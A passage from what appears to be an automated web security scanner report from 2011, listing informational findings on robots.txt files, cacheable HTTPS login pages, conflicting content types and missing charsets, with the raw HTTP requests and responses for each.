Date: Thu, 21 Jul 2011 19:23:08 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1b1a-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

25.21. http://jlinks.industrybrains.com/jsct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:15 GMT
Content-Length: 26

User-agent: *
Disallow: /

25.22. http://l.addthiscdn.com/live/t00/152lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/152lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 21 Jul 2011 19:31:13 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.23. http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:07 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2a513a-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www372
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

25.24. http://mm.chitika.net/minimall previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mm.chitika.net
Path:	/minimall

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mm.chitika.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:51 GMT
Server: Apache
Last-Modified: Tue, 10 Feb 2009 14:32:14 GMT
ETag: "e9840f-20-462915a715780"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /track

25.25. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=77372623
Expires: Thu, 02 Jan 2014 04:27:01 GMT
Date: Thu, 21 Jul 2011 16:03:18 GMT
Connection: close

User-agent: *
Disallow: /

25.26. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 21 Jul 2011 16:12:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.27. http://paid.outbrain.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://paid.outbrain.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306768528000"
Last-Modified: Mon, 30 May 2011 15:15:28 GMT
Content-Type: text/plain
Content-Length: 28
Date: Thu, 21 Jul 2011 19:21:49 GMT
Connection: close

User-agent: *
Disallow: /

25.28. http://pixel.everesttech.net/2368/gr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/2368/gr

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:51 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "1cc8015-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=998937
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

25.29. http://pixel1350.everesttech.net/1350/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel1350.everesttech.net
Path:	/1350/p

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel1350.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:02 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2808029-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=999965
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

25.30. http://pshared.5min.com/Scripts/ThumbSeed2.Style.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pshared.5min.com
Path:	/Scripts/ThumbSeed2.Style.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pshared.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:50 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n27 ( iad-agg-n7), ht-d iad-agg-n7.panthercdn.com
ETag: "0c6c292db8cc1:0"
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 07:58:14 GMT
Age: 6866676
Content-Length: 29
Content-Type: text/plain
Last-Modified: Mon, 02 May 2011 15:14:04 GMT
Connection: close

...User-agent: *
Disallow: /

25.31. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 21 Jul 2011 16:12:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.32. http://puma.vizu.com/cdn/00/00/22/09/smart_tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/cdn/00/00/22/09/smart_tag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:47 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n29 ( iad-agg-n6), ht-d iad-agg-n6.panthercdn.com
ETag: "9c6e3-1a-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Mon, 25 Jul 2011 13:05:16 GMT
Age: 281971
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

User-agent: *
Disallow: /

25.33. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 13 May 2011 05:32:24 GMT
Accept-Ranges: bytes
ETag: "0a448232f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:10 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /

25.34. http://s7.addthis.com/static/r07/sh46.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/static/r07/sh46.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Jun 2011 12:30:08 GMT
ETag: "48051f-1b-4a6603ed41400"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 21 Jul 2011 19:24:50 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYlrYDIJq2AyoFF9sAAA8yBRbbAAAB previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing-cache.google.com
Path:	/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYlrYDIJq2AyoFF9sAAA8yBRbbAAAB

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Thu, 21 Jul 2011 17:38:43 GMT
Expires: Thu, 21 Jul 2011 17:38:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

25.36. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.148.193
X-Cnection: close
Date: Thu, 21 Jul 2011 16:21:20 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

25.37. http://tag.admeld.com/ad/js/785/lifescript/728x90/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/785/lifescript/728x90/ros

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Tue, 19 Jul 2011 21:34:46 GMT
ETag: "f76dd-1a-4a872e2768980"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Thu, 21 Jul 2011 19:29:37 GMT
Connection: close

User-agent: *
Disallow: /

25.38. http://web2.checkm8.com/adam/detect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/adam/detect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: web2.checkm8.com

Response

25.39. http://www.apple.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apple.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
ETag: "41-3241c557be880"
Server: Apache/2.2.14 (Unix)
X-Cached-Time: Thu, 21 Jul 2011 05:14:18 GMT
Cteonnt-Length: 64
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=150
Expires: Thu, 21 Jul 2011 20:27:26 GMT
Date: Thu, 21 Jul 2011 20:24:56 GMT
Content-Length: 64
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:

25.40. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.betabeat.com
Path:	/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.betabeat.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:13:29 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.6-1+lenny2
X-Pingback: http://www.betabeat.com/xmlrpc.php
Content-Length: 54
Age: 536
X-Cache: HIT from VoxCAST
Content-Type: text/plain; charset=utf-8
Set-Cookie: visitor_page_count=1.5; expires=Thu, 21-Jul-2011 16:04:33 GMT; path=/
Connection: close

Sitemap: http:///sitemap.xml

User-agent: *
Disallow:

25.41. http://www.datacard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.datacard.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.datacard.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2010 19:59:25 GMT
Accept-Ranges: bytes
ETag: "6382559149a1cb1:0"
Server: Microsoft-IIS/7.5
Date: Thu, 21 Jul 2011 16:03:20 GMT
Connection: close
Content-Length: 467

# robots.txt for http://www.datacard.com/
User-agent: *
Disallow: /menus/admin/
Disallow: /reports
Disallow: /cgi-bin
Disallow: /id/support_and_drivers/model_listing_ajax.jhtml
Disallow: /id/su
...[SNIP]...

25.42. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.108.43
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

25.43. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 21 Jul 2011 16:03:35 GMT
Expires: Thu, 21 Jul 2011 16:03:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

25.44. http://www.googleadservices.com/pagead/conversion/1071724218/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1071724218/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Thu, 21 Jul 2011 16:03:48 GMT
Expires: Thu, 21 Jul 2011 16:03:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

25.45. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lifescript.com

Response

HTTP/1.0 200 OK
Content-Length: 871
Content-Type: text/plain
Last-Modified: Tue, 19 Jul 2011 21:27:08 GMT
Accept-Ranges: bytes
ETag: "7280549d5a46cc1:1fea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Date: Thu, 21 Jul 2011 19:21:50 GMT
Connection: close

...User-agent: * #Allows all bots

Disallow: /rewards/
Disallow: /search
Disallow: /css
Disallow: /js/
Disallow: /JavaScript/
Disallow: /Services
Disallow: /images/
Disallow: /html/
Disall
...[SNIP]...

25.46. http://www.microsoft.com/en-us/security_essentials/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/plain
Last-Modified: Wed, 20 Jul 2011 17:49:57 GMT
Accept-Ranges: bytes
ETag: "18b24f70547cc1:0"
Server: Microsoft-IIS/7.5
VTag: 2796742500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:16 GMT
Connection: keep-alive
Content-Length: 13512

# Robots.txt file for http://www.microsoft.com
#

User-agent: *
Disallow: /*mnui=-1$
Disallow: /*mnui=1$
Disallow: /*mnui=2$
Disallow: /*mnui=3$
Disallow: /*mnui=4$
Disallow: /*mnui=5$
Disal
...[SNIP]...

25.47. http://www.observer.com/wp-content/themes/nyo_tech/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.observer.com
Path:	/wp-content/themes/nyo_tech/js/global.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.observer.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:12:28 GMT
Server: VoxCAST
Set-Cookie: visitor_page_count=1.5; expires=Thu, 21-Jul-2011 16:05:18 GMT; path=/
X-Powered-By: W3 Total Cache/0.9.2.2
X-Pingback: http://www.observer.com/xmlrpc.php
Content-Length: 54
Age: 430
X-Cache: HIT from VoxCAST
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http:///sitemap.xml

User-agent: *
Disallow:

25.48. http://www.paloaltonetworks.com/cam/switch/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paloaltonetworks.com
Path:	/cam/switch/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paloaltonetworks.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:15:08 GMT
Server: Apache/2.2
Last-Modified: Sat, 30 Apr 2011 00:14:36 GMT
Accept-Ranges: bytes
Content-Length: 352
Connection: close
Content-Type: text/plain; charset=UTF-8

#--------------------------------
User-agent: *
Disallow: /cgi-bin # no programs
Disallow: /js/
Disallow: /flash/
Disallow: /*.pdf$
Disallow: /css/
Disallow: /images/cam/
Disallow: /images/tabs/
Disal
...[SNIP]...

25.49. http://www.righthealth.com/external/ads/clo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.righthealth.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:59 GMT
Server: Apache/2.2.15 (Fedora)
Vary: Host,Accept-Encoding
Last-Modified: Wed, 15 Sep 2010 16:52:28 GMT
Accept-Ranges: bytes
Content-Length: 665
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:22:59 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:37:59 GMT;path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: Yahoo! Slurp
User-agent: Googlebot
User-agent: msnbot
Allow: /browse/*
Disallow: /share
...[SNIP]...

25.50. http://www.scmagazineus.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scmagazineus.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Jul 2011 14:30:05 GMT
Accept-Ranges: bytes
ETag: "1be1cad97b48cc1:0"
Server: Microsoft-IIS/7.5
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:12 GMT
Connection: close
Content-Length: 349

User-agent: *
Disallow: /search
Disallow: */email/
Disallow: */emailArticle/
Disallow: */emailarticle/
Disallow: */printarticle/
Disallow: */PrintArticle/
Disallow: */emailreview/
Disallow: */printrev
...[SNIP]...

25.51. http://www.walmartlabs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmartlabs.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walmartlabs.com

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 19:23:02 GMT
Server: Apache/2.2.15 (Fedora)
X-Pingback: http://www.walmartlabs.com/xmlrpc.php
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8
Set-Cookie: NSC_wt1.xbmnbsumbct.dpn=ffffffff0904176b45525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:25:02 GMT;path=/

User-agent: *
Disallow: /

26. Cacheable HTTPS response previous next
There are 4 instances of this issue:

https://acn-members.apple.com/mo_login/login.lasso
https://domsnitch.googlecode.com/files/v0.707.crx
https://towernet.capitalonebank.com/loginpage.html
https://towernet.capitalonebank.com/whatis.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

26.1. https://acn-members.apple.com/mo_login/login.lasso previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acn-members.apple.com
Path:	/mo_login/login.lasso

Request

Response

26.2. https://domsnitch.googlecode.com/files/v0.707.crx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://domsnitch.googlecode.com
Path:	/files/v0.707.crx

Request

GET /files/v0.707.crx HTTP/1.1
Host: domsnitch.googlecode.com
Connection: keep-alive
Referer: https://code.google.com/p/domsnitch/downloads/detail?name=v0.707.crx&can=2&q=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 150191
Content-Type: application/octet-stream; charset=binary
Content-Disposition: attachment; filename="v0.707.crx"
Accept-Ranges: bytes
Date: Thu, 21 Jul 2011 20:04:07 GMT
Last-Modified: Thu, 23 Jun 2011 15:26:14 GMT
Expires: Thu, 28 Jul 2011 20:04:07 GMT
Server: DFE/largefile
Cache-Control: public, max-age=604800
Age: 3

Cr24............0..0. *.H...........0.......]__.x..7.....q.......M.^.Mr........2.......W<!8....ge.E4z.4.^...p....*..I#mb`..e"O..w.6-.0..u.i.w-...-Cl-5.5....%.(...n...N.C......>.Xb...O.|?.m....I..]
...[SNIP]...

26.3. https://towernet.capitalonebank.com/loginpage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://towernet.capitalonebank.com
Path:	/loginpage.html

Request

Response

26.4. https://towernet.capitalonebank.com/whatis.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://towernet.capitalonebank.com
Path:	/whatis.html

Request

GET /whatis.html HTTP/1.1
Host: towernet.capitalonebank.com
Connection: keep-alive
Referer: https://towernet.capitalonebank.com/loginpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS9475fa=28ae2707ffba8823943c3cef27d75411677c47d78c50a3cf4e29df3f

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:36:47 GMT
Last-Modified: Fri, 12 Nov 2010 14:19:54 GMT
ETag: "39013-172b-c8c5d680"
Accept-Ranges: bytes
Content-Length: 5931
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...

27. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.codeplex.com
Path:	/scripts/v17950/i7/ScriptLoader.ashx

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/javascript; charset=utf-8
text/html; charset=UTF-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 584952
Cache-Control: public, max-age=29593936
Expires: Fri, 29 Jun 2012 17:19:10 GMT
Date: Sat, 23 Jul 2011 04:46:54 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2010, The Dojo Foundation
* Released under
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(m.relaxedDomain){E.iframeHTML+='<script type="text/javascript">
...[SNIP]...

28. HTML does not specify charset previous next
There are 50 instances of this issue:

http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3
http://ad.doubleclick.net/adi/N1558.NetMining/B4820225
http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2
http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3
http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
http://ads.pointroll.com/PortalServe/
http://amch.questionmarket.com/adscgen/st.php
http://analytics.microsoft.com/Sync.html
http://analytics.msn.com/Include.html
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://ds.addthis.com/red/psi/sites/www.seashepherd.org/p.json
http://fls.doubleclick.net/activityi
http://load.exelator.com/load/
http://mediacdn.disqus.com/1311185431/build/system/def.html
http://mediacdn.disqus.com/1311185431/build/system/facebook.html
http://mediacdn.disqus.com/1311382870/build/system/def.html
http://mediacdn.disqus.com/1311382870/build/system/reply.html
http://mediacdn.disqus.com/1311382870/build/system/upload.html
http://odb.outbrain.com/utils/ping.html
